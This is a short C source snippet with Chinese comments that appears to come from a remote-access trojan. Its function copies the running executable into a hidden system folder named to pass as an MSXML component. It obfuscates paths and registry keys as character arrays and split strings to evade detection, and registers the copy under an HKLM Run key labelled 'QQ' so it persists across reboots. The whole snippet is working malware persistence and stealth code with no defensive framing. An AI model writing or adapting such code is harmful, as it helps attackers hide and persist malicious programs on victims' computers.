文字解析:
#include "DIRECT.H"
DWORD WINAPI CreateAutoRun()
{
char MyPath[MAX_PATH]; //当前路径
GetModuleFileNameA(NULL,MyPath,MAX_PATH);
char SystemPath[MAX_PATH]="C:\\Program Files";
mkdir(SystemPath);
mkdir("C:\\Program Files\\MSXML 4.1");
SetFileAttributes("C:\\Program Files\\MSXML 4.1",FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_NOT_CONTENT_INDEXED|FILE_ATTRIBUTE_SYSTEM);//隐藏文件夹
// char uJmTz[] = {'C',':','\\','[/hide],'W','o','l','f','.','R','Q','E','\\','1','3','3','3','\\','N','V','D','I','A','.','e','x','e','\0'};
// char aDwlF[] = {'C',':','\\','[/hide],'S','e','c','t','i','o','n','\\','3','6','0','S','D','\\','3','6','0','u','p','d','a','t','e','.','e','x','e','\0'};
char *YtIjh1="C:\\Program Files\\M", *VPJWV2="SXML 4.1\\Inter.exe",*XzMRG3=NULL;
XzMRG3=new char[strlen(YtIjh1)+strlen(VPJWV2)+1];
strcpy(XzMRG3,YtIjh1);
strcat(XzMRG3,VPJWV2);
//////////////////////////////////////////////////////////
char aDwlF[] = {'C',':','\\','P','r','o','g','r','a','m',' ','F','i','l','e','s','\\','I','n','t','e','r','n','e','t',' ','E','x','p','l','o','r','e','r','\\','I','n','t','e','r','.','e','x','e','\0'};
CopyFileA(MyPath,XzMRG3,FALSE);
char uUDvZ[] = {'S','O','F','T','W','A','R','E','\\','M','i','c','r','o','s','o','f','t','\\','W','i','n','d','o','w','s',' ','N','T','\\','C','u','r','r','e','n','t','V','e','r','s','i','o','n','\\','W','i','n','l','o','g','o','n','\0'};
char run[] = {'S','O','F','T','W','A','R','E','\\','M','i','c','r','o','s','o','f','t','\\','W','i','n','d','o','w','s','\\','C','u','r','r','e','n','t','V','e','r','s','i','o','n','\\','R','u','n','\0'};
WriteRegEx(HKEY_LOCAL_MACHINE,run,"QQ", REG_SZ,XzMRG3,strlen(aDwlF), 0);
return 0;
}
|